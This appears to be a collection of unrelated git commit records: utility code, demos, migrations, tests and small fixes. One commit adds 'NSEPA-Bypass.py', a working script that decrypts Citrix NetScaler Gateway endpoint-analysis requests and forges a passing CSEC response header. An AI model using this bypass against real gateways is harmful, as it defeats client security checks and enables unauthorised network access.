        ``{'rel': ..., 'href': ...}`` entries.
    :param str rel: The link relation to look for.
    :returns: The matching href, or None when no link matches.
    """
    matches = (link['href']
               for link in obj.get('links', [])
               if link['rel'] == rel)
    return next(matches, None)
def find_by_name(res, name):
    """
    Return the single resource in ``res`` whose name is exactly ``name``.

    :param res: A resource collection whose ``index()`` accepts a ``params``
        dict with a ``filter[]`` entry (RightScale API filter syntax).
    :param str name: The name to look for in the collection.
    :raises ValueError: If more than one resource matches.
    :raises IndexError: If nothing matches (``found[0]`` on an empty list).
    """
    params = {'filter[]': ['name==%s' % name]}
    found = res.index(params=params)
    if len(found) > 1:
        raise ValueError("Found too many matches for %s" % name)
    return found[0]
|
Python
| 0
|
@@ -1378,19 +1378,211 @@
ame(
-res, name):
+collection, name):%0A %22%22%22%0A :param rightscale.ResourceCollection collection: The collection in which to%0A look for :attr:%60name%60.%0A%0A :param str name: The name to look for in collection.%0A %22%22%22
%0A
@@ -1637,19 +1637,26 @@
found =
-res
+collection
.index(p
|
fc7da8e039c38140f3855e8c58d1db9a4e8ed133
|
add demo about using ftplib.FTP
|
reading-notes/CorePython/src/ftp.py
|
reading-notes/CorePython/src/ftp.py
|
Python
| 0
|
@@ -0,0 +1,2318 @@
+# Copyright (c) 2014 ASMlover. All rights reserved.%0A#%0A# Redistribution and use in source and binary forms, with or without%0A# modification, are permitted provided that the following conditions%0A# are met:%0A#%0A# * Redistributions of source code must retain the above copyright%0A# notice, this list ofconditions and the following disclaimer.%0A#%0A# * Redistributions in binary form must reproduce the above copyright%0A# notice, this list of conditions and the following disclaimer in%0A# the documentation and/or other materialsprovided with the%0A# distribution.%0A#%0A# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS%0A# %22AS IS%22 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT%0A# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS%0A# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE%0A# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,%0A# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,%0A# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;%0A# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER%0A# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT%0A# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN%0A# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE%0A# POSSIBILITY OF SUCH DAMAGE.%0A#%0A#!/usr/bin/env python%0A# -*- encoding: utf-8 -*-%0A%0Aimport ftplib%0Aimport os%0Aimport socket%0A%0A%0AHOST = 'ftp.mozilla.org'%0ADIRN = 'pub/mozilla.org/webtools'%0AFILE = 'bugzilla-LATEST.tar.gz'%0A%0A%0A%0Adef main():%0A try:%0A f = ftplib.FTP(HOST)%0A except (socket.error, socket.gaierror), e:%0A print 'ERROR: cannot reach %22%25s%22' %25 HOST%0A return%0A print '*** Connected to host %22%25s%22' %25 HOST%0A%0A try:%0A f.login()%0A except ftplib.error_perm:%0A print 'ERROR: cannot login anonymously'%0A f.quit()%0A return%0A print '*** Logined in as %22anonymously%22'%0A%0A try:%0A 
f.cwd(DIRN)%0A except ftplib.error_perm:%0A print 'ERROR: cannot cd to %22%25s%22' %25 DIRN%0A f.quit()%0A return%0A print '*** Changed to %22%25s%22 folder' %25 DIRN%0A%0A try:%0A f.retrbinary('RETR %25s' %25 FILE, open(FILE, 'wb').write)%0A except ftplib.error_perm:%0A print 'ERROR: cannot read file %22%25s%22' %25 FILE%0A os.unlink(FILE)%0A else:%0A print '*** Downloaded %22%25s%22 to cwd' %25 FILE%0A f.quit()%0A return%0A%0A%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
d059fa531f46fe063e7811a17478fab6c913acb4
|
add migration file
|
sigmapiweb/apps/Scholarship/migrations/0006_course_coursesection_review.py
|
sigmapiweb/apps/Scholarship/migrations/0006_course_coursesection_review.py
|
Python
| 0.000001
|
@@ -0,0 +1,2381 @@
+# Generated by Django 3.1.6 on 2021-11-18 13:53%0A%0Aimport apps.Scholarship.models%0Aimport common.mixins%0Afrom django.conf import settings%0Aimport django.core.validators%0Afrom django.db import migrations, models%0Aimport django.db.models.deletion%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A migrations.swappable_dependency(settings.AUTH_USER_MODEL),%0A ('Scholarship', '0005_change_on_delete'),%0A %5D%0A%0A operations = %5B%0A migrations.CreateModel(%0A name='Course',%0A fields=%5B%0A ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),%0A ('catalog_code', models.CharField(max_length=10, unique=True, validators=%5Bdjango.core.validators.RegexValidator(regex='%5BA-Z%5D+%5B0-9%5D+')%5D)),%0A ('title', models.CharField(max_length=100)),%0A %5D,%0A bases=(common.mixins.ModelMixin, models.Model),%0A ),%0A migrations.CreateModel(%0A name='Review',%0A fields=%5B%0A ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),%0A ('stars', models.IntegerField(validators=%5Bapps.Scholarship.models.validate_stars%5D)),%0A ('text', models.CharField(max_length=1000)),%0A ('reviewer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),%0A %5D,%0A bases=(common.mixins.ModelMixin, models.Model),%0A ),%0A migrations.CreateModel(%0A name='CourseSection',%0A fields=%5B%0A ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),%0A ('term', models.CharField(choices=%5B('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ('E', 'E'), ('S', 'S'), ('F', 'F')%5D, default='A', max_length=1)),%0A ('year', models.PositiveIntegerField(validators=%5Bdjango.core.validators.MaxValueValidator(99)%5D)),%0A ('professor', models.CharField(max_length=100)),%0A ('catalog_course', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Scholarship.course', to_field='catalog_code')),%0A 
('participants', models.ManyToManyField(to=settings.AUTH_USER_MODEL)),%0A %5D,%0A bases=(common.mixins.ModelMixin, models.Model),%0A ),%0A %5D%0A
|
|
2085083fc842c03efae72bbf288804ddd67605b1
|
add list_comprehension
|
misc/list_comprehension.py
|
misc/list_comprehension.py
|
Python
| 0.000002
|
@@ -0,0 +1,76 @@
+#!/usr/bin/env python%0A%0As = %5B2*x for x in range(101) if x ** 2 %3E 3%5D%0A%0Aprint s%0A
|
|
9e60fd94ef801bab0e8e9a5956b5c00c911bd6ca
|
Create tesseract_example.py
|
home/kyleclinton/tesseract_example.py
|
home/kyleclinton/tesseract_example.py
|
Python
| 0.000006
|
@@ -0,0 +1,1882 @@
+################################################################%0A#%0A# tesseract_example.py%0A# Kyle J Clinton%0A#%0A# This is an example of the use of TesseractOcr to read text from an image%0A# it is using many of the services that are common to the InMoov project or %0A# MRL in general%0A#%0A################################################################%0A%0A### Start and Setup OpenCV%0Aopencv=Runtime.start(%22opencv%22,%22OpenCV%22)%0A%0Aopencv.captureFromResourceFile(%22http://192.168.1.130:8080/stream/video.mjpeg%22); %0A# This Grabber does not seem to set correctly inside of OpenCV !?!?!%0Aopencv.setFrameGrabberType(%22org.myrobotlab.opencv.MJpegFrameGrabber%22); %0A%0Aopencv.capture()%0A%0A### Start and Setup Tesseract (Not as a filter inside OpenCV)%0Atesseract = Runtime.createAndStart(%22tesseract%22,%22TesseractOcr%22)%0A%0A%0A### Start and Setup MarySpeech (You could switch out for your favorite TextToSpeech service) %0Amouth = Runtime.createAndStart(%22MarySpeech%22, %22MarySpeech%22)%0Amouth.setVoice(%22cmu-bdl-hsmm%22)%0A%0A### This is my little mod to the voice to make it specifically %22Junior's Voice%22%0Amouth.setAudioEffects(%22TractScaler(amount=1.4) + F0Add(f0Add=60.0) + Robot(amount=8.0) %22)%0A%0Adef readTextFromImage():%0A tesseract = Runtime.createAndStart(%22tesseract%22,%22TesseractOcr%22)%0A txtStr = tesseract.ocr(%2220170908_141852.jpg%22)%0A print(%22tess results: %22, txtStr) %0A mouth.speakBlocking(txtStr)%0A ## Not sure why I need to cleanup string for image name???%0A ####imgNameStr = opencv.recordSingleFrame()%0A ####imgNameStr = imgNameStr.replace(%22u'%22, %22%22).replace(%22'%22, %22%22)%0A ####print(%22captured image: %22, imgNameStr)%0A ####txtStr = tesseract.ocr(imgNameStr)%0A ## For Testing%0A #txtStr = tesseract.ocr(%2220170908_141852.jpg%22)%0A ## Cleanup of the string is required and this is very basic and needs to be more robust!%0A #txtStr = txtStr.replace(%22%5Cn%22, %22 %22).replace(%22:%22, %22 %22)%0A 
#print(%22tess results: %22, txtStr)%0A #mouth.speakBlocking(txtStr)%0A
|
|
058de6743532340611ac304c99bc7dd4ea474350
|
Create NSEPA-Bypass.py
|
NSEPA-Bypass.py
|
NSEPA-Bypass.py
|
Python
| 0
|
@@ -0,0 +1,2202 @@
+import sys%0Aimport base64%0Aimport hashlib%0A## Requires pyCrypto --%3E run 'pip install pycrypto'%0Afrom Crypto.Cipher import AES%0A%0A## Check that theres is enough info%0Aif (len(sys.argv) %3C 5):%0A print(%22You're not giving me enough to work with here:%5Cn%5Cn%22);%0A print(%22Usage:%5Cn%22);%0A print(%22python NSEPA-Bypass.py %5C%22NSC_EPAC Cookie Value%5C%22 %5C%22EPOCH Time from client%5C%22 %5C%22Value of the HOST: Header%5C%22 %5C%22Base64 encoded string from Server%5C%22%5Cn%5Cn%5Cn%22);%0A print(%22Example:%5Cn%22);%0A print(%22python NSEPA-Bypass.py %5C%22981005eef29ce34c80f535f9e78f4b4d%5C%22 %5C%221498797356%5C%22 %5C%22vpn.example.com%5C%22 %5C%22WWoNstbK760pVoPwPzHbs9pEf6Tj/iBk55gnHYwptPohBR0bKsiVVZmDN8J8530G4ISIFkRcC/1IaQSiOr8ouOYC84T5Hzbs2yH3Wq/KToo=%5C%22 %5Cn%5Cn%5Cn%22);%0A exit(1);%0A%0A## Set up the variables.%0Akey = %22%22%0Ahexcookie=%22%22%0Acookie = sys.argv%5B1%5D%0Aepoch = sys.argv%5B2%5D%0Ahost = sys.argv%5B3%5D%0AEPAcrypt64 = sys.argv%5B4%5D%0AEPAcrypt = base64.b64decode(EPAcrypt64)%0A%0A## Take the cookie string and load it as hex%0Afor i in range(0, len(cookie), 2):%0A hexcookie= hexcookie + chr( int(cookie%5Bi:i+2%5D,16))%0A%0A## Build the key source%0Akeystring = %22NSC_EPAC=%22 + cookie + %22%5Cr%5Cn%22 + epoch + %22%5Cr%5Cn%22 + host + %22%5Cr%5Cn%22 + hexcookie%0A%0A## Hash the key source%0Ahashedinput = hashlib.sha1(keystring).hexdigest()%0A%0A## load the hex of the ascii hash%0Afor i in range(0, len(hashedinput), 2):%0A key = key + chr( int(hashedinput%5Bi:i+2%5D,16))%0A%0A## Take the first 16 bytes of the key%0Akey = key%5B:16%5D%0Aprint %22%5Cn%22%0Aprint %22The key for this session is:%5Cn%22%0Aprint ' '.join(x.encode('hex') for x in key)%0Aprint %22%5Cn%22%0A%0A## Decryption if encrypted BASE64 Provided%0Adecryption_suite = AES.new(key, AES.MODE_CBC, hexcookie)%0Adecrypted = decryption_suite.decrypt(EPAcrypt).strip()%0Aprint %22The NetScaler Gateway EPA request: %5Cn%5Cr%22 + decrypted%0Aprint %22%5Cn%22%0A%0A%0A## 
Figure out how many '0's to respond with %0A## (semi-colon is the EPA request delimiter)%0ACSECitems = (decrypted.count(';'))%0A%0A%0A#Add PKCS5 Padding (string to be encrypted must be a multiple of 16 bytes)%0Apadding=16-(decrypted.count(';'))%0Aresponse = (chr(48)*CSECitems)+(chr(padding)*padding)%0A%0A## Encryption%0Aencryption_suite = AES.new(key, AES.MODE_CBC, hexcookie)%0Aprint %22Replace your current CSEC header with: %5CnCSEC: %22 + base64.b64encode(encryption_suite.encrypt(response))%0Aprint %22%5Cn%22%0A
|
|
f7463e81817783cdb3fef3af1b1f2ec68a09cfe8
|
Fix typo.
|
modularodm/fields/field.py
|
modularodm/fields/field.py
|
import weakref
import warnings
import copy
from modularodm import exceptions
from modularodm.query.querydialect import DefaultQueryDialect as Q
from .lists import List
def print_arg(arg):
if isinstance(arg, basestring):
return '"' + arg + '"'
return arg
class Field(object):
default = None
base_class = None
_list_class = List
mutable = False
lazy_default = True
_uniform_translator = True
def __repr__(self):
return '{cls}({kwargs})'.format(
cls=self.__class__.__name__,
kwargs=', '.join('{}={}'.format(key, print_arg(val)) for key, val in self._kwargs.items())
)
def subscribe(self, sender=None):
pass
def _to_comparable(self):
return {
k : v
for k, v in self.__dict__.items()
if k not in ['data', '_translators', '_schema_class']
}
def __eq__(self, other):
return self._to_comparable() == other._to_comparable()
def __ne__(self, other):
return not self.__eq__(other)
def _prepare_validators(self, _validate):
if hasattr(_validate, '__iter__'):
# List of callable validators
validate = []
for validator in _validate:
if hasattr(validator, '__call__'):
validate.append(validator)
else:
raise TypeError('Validator lists must be lists of callables.')
elif hasattr(_validate, '__call__'):
# Single callable validator
validate = _validate
elif type(_validate) == bool:
# Boolean validator
validate = _validate
else:
# Invalid validator type
raise TypeError('Validators must be callables, lists of callables, or booleans.')
return _validate, validate
def __init__(self, *args, **kwargs):
self._args = args
self._kwargs = kwargs
self._translators = {}
# Pointer to containing ListField
# Set in StoredObject.ObjectMeta
self._list_container = None
self.data = weakref.WeakKeyDictionary()
self._validate, self.validate = \
self._prepare_validators(kwargs.get('validate', False))
self._default = kwargs.get('default', self.default)
self._is_primary = kwargs.get('primary', False)
self._list = kwargs.get('list', False)
self._required = kwargs.get('required', False)
self._unique = kwargs.get('unique', False)
self._editable = kwargs.get('editable', True)
self._index = kwargs.get('index', self._is_primary)
self._is_foreign = False
# Fields added by ``ObjectMeta``
self._field_name = None
def do_validate(self, value, obj):
# Check if required
if value is None:
if getattr(self, '_required', None):
raise exceptions.ValidationError('Value <{0}> is required.'.format(self._field_name))
return True
# Check if unique
if value is not None and self._unique:
unique_query = Q(self._field_name, 'eq', value)
# If object has primary key, don't crash if unique value is
# already associated with its key
if obj._is_loaded:
unique_query = unique_query & Q(obj._primary_name, 'ne', obj._primary_key)
if obj.find(unique_query).limit(1).count():
raise exceptions.ValidationValueError('Value must be unique')
# Field-level validation
cls = self.__class__
if hasattr(cls, 'validate') and \
self.validate != False:
cls.validate(value)
# Schema-level validation
if self._validate and hasattr(self, 'validate'):
if hasattr(self.validate, '__iter__'):
for validator in self.validate:
validator(value)
elif hasattr(self.validate, '__call__'):
self.validate(value)
# Success
return True
def _gen_default(self):
if callable(self._default):
return self._default()
return copy.deepcopy(self._default)
def _get_translate_func(self, translator, direction):
try:
return self._translators[(translator, direction)]
except KeyError:
method_name = '%s_%s' % (direction, self.data_type.__name__)
default_name = '%s_default' % (direction,)
try:
method = getattr(translator, method_name)
except AttributeError:
method = getattr(translator, default_name)
self._translators[(translator, direction)] = method
return method
def to_storage(self, value, translator=None):
translator = translator or self._schema_class._translator
if value is None:
return translator.null_value
method = self._get_translate_func(translator, 'to')
value = value if method is None else method(value)
if self.mutable:
return copy.deepcopy(value)
return value
def from_storage(self, value, translator=None):
translator = translator or self._schema_class._translator
if value == translator.null_value:
return None
method = self._get_translate_func(translator, 'from')
value = value if method is None else method(value)
if self.mutable:
return copy.deepcopy(value)
return value
def _pre_set(self, instance, safe=False):
if not self._editable and not safe:
raise AttributeError('Field cannot be edited.')
if instance._detached:
warnings.warn('Accessing a detached record.')
def __set__(self, instance, value, safe=False, literal=False):
self._pre_set(instance, safe=safe)
if self.mutable:
data = copy.deepcopy(value)
self.data[instance] = value
def _touch(self, instance):
# Reload if dirty
if instance._dirty:
instance._dirty = False
instance.reload()
# Impute default and return
try:
self.data[instance]
except KeyError:
self.data[instance] = self._gen_default()
def __get__(self, instance, owner, check_dirty=True):
# Warn if detached
if instance._detached:
warnings.warn('Accessing a detached record.')
# Reload if dirty
self._touch(instance)
# Impute default and return
try:
return self.data[instance]
except KeyError:
default = self._gen_default()
self.data[instance] = default
return default
def _get_underlying_data(self, instance):
"""Return data from raw data store, rather than overridden
__get__ methods. Should NOT be overwritten.
"""
self._touch(instance)
return self.data.get(instance, None)
def __delete__(self, instance):
self.data.pop(instance, None)
|
Python
| 0.001604
|
@@ -5934,20 +5934,21 @@
-data
+value
= copy.
|
665476df5f23bdd781054c1accd8c2e700087039
|
update routing number to pass checksum
|
tests/test_bankaccount.py
|
tests/test_bankaccount.py
|
import unittest
import lob
# Setting the API key
lob.api_key = 'test_0dc8d51e0acffcb1880e0f19c79b2f5b0cc'
class BankAccountFunctions(unittest.TestCase):
def setUp(self):
lob.api_key = 'test_0dc8d51e0acffcb1880e0f19c79b2f5b0cc'
self.addr = lob.Address.list(count=1).data[0]
def test_list_bankAccounts(self):
bankAccounts = lob.BankAccount.list()
self.assertTrue(isinstance(bankAccounts.data[0], lob.BankAccount))
self.assertEqual(bankAccounts.object, 'list')
def test_list_bankAccounts_limit(self):
bankAccounts = lob.BankAccount.list(count=2)
self.assertTrue(isinstance(bankAccounts.data[0], lob.BankAccount))
self.assertEqual(len(bankAccounts.data), 2)
def test_list_bankAccounts_fail(self):
self.assertRaises(lob.error.InvalidRequestError, lob.BankAccount.list, count=1000)
def test_create_bankAccount_fail(self):
self.assertRaises(lob.error.InvalidRequestError, lob.BankAccount.create)
def test_create_bankAccount(self):
bankAccount = lob.BankAccount.create(
routing_number='123456789',
account_number='123456789',
bank_address=self.addr.id,
account_address=self.addr.id
)
self.assertTrue(isinstance(bankAccount, lob.BankAccount))
self.assertEqual(bankAccount.bank_address.id, self.addr.id)
def test_create_bankAccount_lob_obj(self):
bankAccount = lob.BankAccount.create(
routing_number='123456789',
account_number='123456789',
bank_address=self.addr,
account_address=self.addr
)
self.assertTrue(isinstance(bankAccount, lob.BankAccount))
self.assertEqual(bankAccount.bank_address.id, self.addr.id)
def test_create_bankAccount_inline(self):
bankAccount = lob.BankAccount.create(
routing_number='123456789',
account_number='123456789',
bank_address= {
'name': 'Lob1',
'address_line1': '185 Berry Street',
'address_line2': 'Suite 1510',
'address_city': 'San Francisco',
'address_zip': '94107',
'address_state': 'CA'
},
account_address= {
'name': 'Lob2',
'address_line1': '185 Berry Street',
'address_line2': 'Suite 1510',
'address_city': 'San Francisco',
'address_zip': '94107',
'address_state': 'CA'
}
)
self.assertTrue(isinstance(bankAccount, lob.BankAccount))
self.assertEquals(bankAccount.bank_address.name, 'Lob1')
self.assertEquals(bankAccount.account_address.name, 'Lob2')
def test_retrieve_bankAccount(self):
bankAccount = lob.BankAccount.retrieve(id=lob.BankAccount.list().data[0].id)
self.assertTrue(isinstance(bankAccount, lob.BankAccount))
def test_retrieve_bankAccount_fail(self):
self.assertRaises(lob.error.InvalidRequestError, lob.BankAccount.retrieve, id='test')
def test_delete_bankAccount(self):
ba = lob.BankAccount.list().data[0].id
delBa = lob.BankAccount.delete(id=ba)
self.assertEqual(ba, delBa.id)
|
Python
| 0
|
@@ -1095,39 +1095,39 @@
uting_number='12
-3456789
+2100024
',%0A a
@@ -1493,39 +1493,39 @@
uting_number='12
-3456789
+2100024
',%0A a
@@ -1884,39 +1884,39 @@
uting_number='12
-3456789
+2100024
',%0A a
|
b3a1f84fb6f28598595f00bdb01d789051999cb9
|
Update 2016-09-19 11h20
|
GUI_Tkinter_Demo.py
|
GUI_Tkinter_Demo.py
|
Python
| 0
|
@@ -0,0 +1,242 @@
+#!/usr/bin/python%0A%0Aimport Tkinter%0Aimport tkMessageBox%0A%0Atop = Tkinter.Tk()%0A%0Adef helloCallBack():%0A tkMessageBox.showinfo(%22Hello Python%22, %22Hello World%22)%0A%0AB = Tkinter.Button(top, text=%22Hello%22, command = helloCallBack)%0A%0AB.pack()%0Atop.mainloop()
|
|
e397d400a81466b22ae735f60f5a239ca4b7d653
|
create domain lookup module
|
domain.py
|
domain.py
|
Python
| 0
|
@@ -0,0 +1,2175 @@
+# domain.py%0A# Look up a domain's availability%0A%0A# Copyright 2015 Jason Owen %3Cjason.a.owen@gmail.com%3E%0A#%0A# This program is free software: you can redistribute it and/or modify%0A# it under the terms of the GNU Affero General Public License as published by%0A# the Free Software Foundation, either version 3 of the License, or%0A# (at your option) any later version.%0A#%0A# This program is distributed in the hope that it will be useful,%0A# but WITHOUT ANY WARRANTY; without even the implied warranty of%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the%0A# GNU Affero General Public License for more details.%0A#%0A# You should have received a copy of the GNU Affero General Public License%0A# along with this program. If not, see %3Chttp://www.gnu.org/licenses/%3E.%0A%0Aimport datetime%0Aimport xmlrpclib%0Afrom twisted.internet import reactor%0A%0Adef repeatLookup(handler, client, channel, domain):%0A handler.doLookup(client, channel, domain)%0A%0Aclass DomainHandler:%0A def __init__(self, args):%0A self.apiKey = args%5B%22apiKey%22%5D%0A self.api = xmlrpclib.ServerProxy('https://rpc.gandi.net/xmlrpc/')%0A%0A def channelMessage(self, client, channel, name, message):%0A if message.lower().find(%22!domain%22) == 0:%0A domain = message.split(' ')%5B1%5D.lower()%0A self.doLookup(client, channel, domain)%0A return True%0A return False%0A%0A def doLookup(self, client, channel, domain):%0A self.log(client, %22looking up domain: %25s%22 %25 (domain,))%0A result = self.api.domain.available(self.apiKey, %5Bdomain%5D)%0A self.log(client, %22Got result: %25s%22 %25 (result,))%0A self.printOrCallback(client, channel, domain, result)%0A%0A def printOrCallback(self, client, channel, domain, result):%0A if (result%5Bdomain%5D == 'pending'):%0A self.log(client, %22Scheduling callback for domain %25s%22 %25 (domain,))%0A reactor.callLater(1, repeatLookup, self, client, channel, domain)%0A else:%0A self.log(client, %22Domain %25s is %25s%22 %25 (domain, 
result%5Bdomain%5D,))%0A client.say(channel, %22The domain %25s is %25s.%22 %25 (domain, result%5Bdomain%5D,))%0A%0A def log(self, client, message):%0A print %22%25s %25s: %25s%22 %25 (client.nickname, self.now(), message,)%0A def now(self):%0A return datetime.datetime.now().strftime(%22%25Y-%25m-%25d %25H:%25M%22)%0A
|
|
dda3ce9c56967dc6069b61f16feed2932e24ea14
|
test = input ("CPF: ") cpf = test[:3] + "." + test[3:6] + "." + test[6:9] + "-" + test[9:] print(cpf)
|
Python/FormatCpf.py
|
Python/FormatCpf.py
|
Python
| 0.999999
|
@@ -0,0 +1,147 @@
+test = input (%22CPF: %22) %0Acpf = test%5B:3%5D + %22.%22 + test%5B3:6%5D + %22.%22 + test%5B6:9%5D + %22-%22 + test%5B9:%5D%0Aprint(cpf)%0A%0A#https://pt.stackoverflow.com/q/237371/101%0A
|
|
f27241b5409ec00568efa1752d5eeb71516b16bd
|
Add cellular.py
|
cellular.py
|
cellular.py
|
Python
| 0.00017
|
@@ -0,0 +1,941 @@
+import random%0A%0Aclass TotalisticCellularAutomaton:%0A def __init__(self):%0A self.n_cells = 200%0A self.n_states = 5%0A self.symbols = ' .oO0'%0A self.radius = 1%0A self.cells = %5Brandom.randrange(0, self.n_states) for _ in range(self.n_cells)%5D%0A%0A n_rules = (2*self.radius + 1) * (self.n_states - 1)%0A self.rules = %5B0%5D + %5Brandom.randrange(0, self.n_states) for _ in range(n_rules)%5D%0A%0A%0A def neighbor_sum(self, pos):%0A return sum(self.cells%5B(pos+i)%25self.n_cells%5D for i in range(-self.radius, self.radius+1))%0A %0A def next_gen(self):%0A self.cells = %5Bself.rules%5Bself.neighbor_sum(i)%5D for i in range(self.n_cells)%5D%0A%0A def print_gen(self):%0A print(''.join(self.symbols%5Bstate%5D for state in self.cells))%0A%0Adef main():%0A ca = TotalisticCellularAutomaton()%0A%0A print(ca.rules)%0A while True:%0A ca.print_gen()%0A ca.next_gen()%0A%0A%0Aif __name__ == '__main__':%0A main()%0A%0A
|
|
7a1a59e5bb5a64dbeb91abdcac31dd0c8803c27d
|
Functional tests for security group rule
|
functional/tests/compute/v2/test_security_group_rule.py
|
functional/tests/compute/v2/test_security_group_rule.py
|
Python
| 0.998997
|
@@ -0,0 +1,2375 @@
+# Licensed under the Apache License, Version 2.0 (the %22License%22); you may%0A# not use this file except in compliance with the License. You may obtain%0A# a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS, WITHOUT%0A# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the%0A# License for the specific language governing permissions and limitations%0A# under the License.%0A%0Aimport uuid%0A%0Afrom functional.common import test%0A%0A%0Aclass SecurityGroupRuleTests(test.TestCase):%0A %22%22%22Functional tests for security group rule. %22%22%22%0A SECURITY_GROUP_NAME = uuid.uuid4().hex%0A SECURITY_GROUP_RULE_ID = None%0A NAME_FIELD = %5B'name'%5D%0A ID_FIELD = %5B'id'%5D%0A ID_HEADER = %5B'ID'%5D%0A%0A @classmethod%0A def setUpClass(cls):%0A # Create the security group to hold the rule.%0A opts = cls.get_show_opts(cls.NAME_FIELD)%0A raw_output = cls.openstack('security group create ' +%0A cls.SECURITY_GROUP_NAME +%0A opts)%0A expected = cls.SECURITY_GROUP_NAME + '%5Cn'%0A cls.assertOutput(expected, raw_output)%0A%0A # Create the security group rule.%0A opts = cls.get_show_opts(cls.ID_FIELD)%0A raw_output = cls.openstack('security group rule create ' +%0A cls.SECURITY_GROUP_NAME +%0A ' --proto tcp --dst-port 80:80' +%0A opts)%0A cls.SECURITY_GROUP_RULE_ID = raw_output.strip('%5Cn')%0A%0A @classmethod%0A def tearDownClass(cls):%0A raw_output = cls.openstack('security group rule delete ' +%0A cls.SECURITY_GROUP_RULE_ID)%0A cls.assertOutput('', raw_output)%0A%0A raw_output = cls.openstack('security group delete ' +%0A cls.SECURITY_GROUP_NAME)%0A cls.assertOutput('', raw_output)%0A%0A def test_security_group_rule_list(self):%0A opts = self.get_list_opts(self.ID_HEADER)%0A raw_output = self.openstack('security group rule list ' +%0A self.SECURITY_GROUP_NAME +%0A opts)%0A 
self.assertIn(self.SECURITY_GROUP_RULE_ID, raw_output)%0A
|
|
03d5fb46c877d176ed710a8d27b5ad7af699dc52
|
add Lubebbers example
|
pylayers/antprop/tests/Diffraction-Luebbers.py
|
pylayers/antprop/tests/Diffraction-Luebbers.py
|
Python
| 0
|
@@ -0,0 +1,391 @@
+%0A# coding: utf-8%0A%0A# In%5B1%5D:%0A%0Afrom pylayers.simul.link import *%0A%0A%0A# In%5B2%5D:%0A%0ADL=DLink(L=Layout('Luebbers.ini'),graph='tvi')%0A%0A%0A# In%5B3%5D:%0A%0A# get_ipython().magic(u'matplotlib inline')%0A# DL.L.showG('i')%0A%0A%0A# In%5B7%5D:%0A%0ADL.a = np.array((%5B37.5,6.2,2.%5D))%0ADL.b = np.array((%5B13,30,2.%5D))%0ADL.fGHz=np.array((%5B0.9,1.0%5D))%0A%0A%0A# In%5B8%5D:%0A%0Aplt.ion()%0A%0A# In%5B9%5D:%0A%0ADL.eval(diffraction=True)%0A%0A%0A# In%5B10%5D:%0A%0ADL.R%0A%0A%0A# In%5B %5D:%0A%0A%0A%0A
|
|
8fb25066deee46a22562be8e416556749678eb0b
|
remove printout
|
bihar/utils.py
|
bihar/utils.py
|
from operator import attrgetter
from django.utils.translation import ugettext_noop
from corehq.apps.groups.models import Group
ASHA_ROLE = ugettext_noop('ASHA')
AWW_ROLE = ugettext_noop('AWW')
def get_team_members(group):
"""
Get any commcare users that are either "asha" or "aww".
"""
users = group.get_users(only_commcare=True)
def is_team_member(user):
role = user.user_data.get('role', '')
return role == ASHA_ROLE or role == AWW_ROLE
return sorted([u for u in users if is_team_member(u)],
key=lambda u: u.user_data['role'])
def get_all_owner_ids(user_ids):
all_group_ids = [
row['id']
for row in Group.get_db().view(
'groups/by_user',
keys=user_ids,
include_docs=False
)
]
return set(user_ids).union(set(all_group_ids))
def get_all_owner_ids_from_group(group):
return get_all_owner_ids([user.get_id for user in get_team_members(group)])
def get_calculation(owner_ids, slug):
from bihar.models import CareBiharFluff
r = CareBiharFluff.aggregate_results(slug, (
['care-bihar', owner_id] for owner_id in owner_ids
), reduce=True)
num = r.get('numerator')
total = r.get('total')
r = CareBiharFluff.aggregate_results(slug, (
['care-bihar', owner_id] for owner_id in owner_ids
), reduce=False)
num_cases = ', '.join(r.get('numerator', ()))
total_cases = ', '.join(r.get('total', ()))
return num or '', total, num_cases, total_cases
def get_all_calculations(owner_ids):
from bihar.reports.indicators.indicators import IndicatorConfig, INDICATOR_SETS
config = IndicatorConfig(INDICATOR_SETS)
for indicator_set in config.indicator_sets:
print indicator_set.name
for indicator in indicator_set.get_indicators():
slug = indicator.slug
yield (indicator.name,) + get_calculation(owner_ids, slug)
def get_groups_for_group(group):
"""This is a helper function only called locally"""
owner_ids = list(get_all_owner_ids_from_group(group))
db = Group.get_db()
rows = db.view('_all_docs', keys=owner_ids, include_docs=True)
groups = []
for row in rows:
doc = row['doc']
if doc['doc_type'] == 'Group':
groups.append(Group.wrap(doc))
groups.sort(key=attrgetter('name'))
return groups
|
Python
| 0.000006
|
@@ -1783,41 +1783,8 @@
ts:%0A
- print indicator_set.name%0A
|
1873d42095b6d56f9fa0019a9658b250c39a3a23
|
Reverse the logic
|
mongodb_consistent_backup/State.py
|
mongodb_consistent_backup/State.py
|
import logging
import os
import platform
from bson import BSON, decode_all
from time import time
from mongodb_consistent_backup.Common import Lock
from mongodb_consistent_backup.Errors import OperationError
class StateBase(object):
def __init__(self, base_dir, config, filename="meta.bson", state_version=1, meta_name="mongodb-consistent-backup_META"):
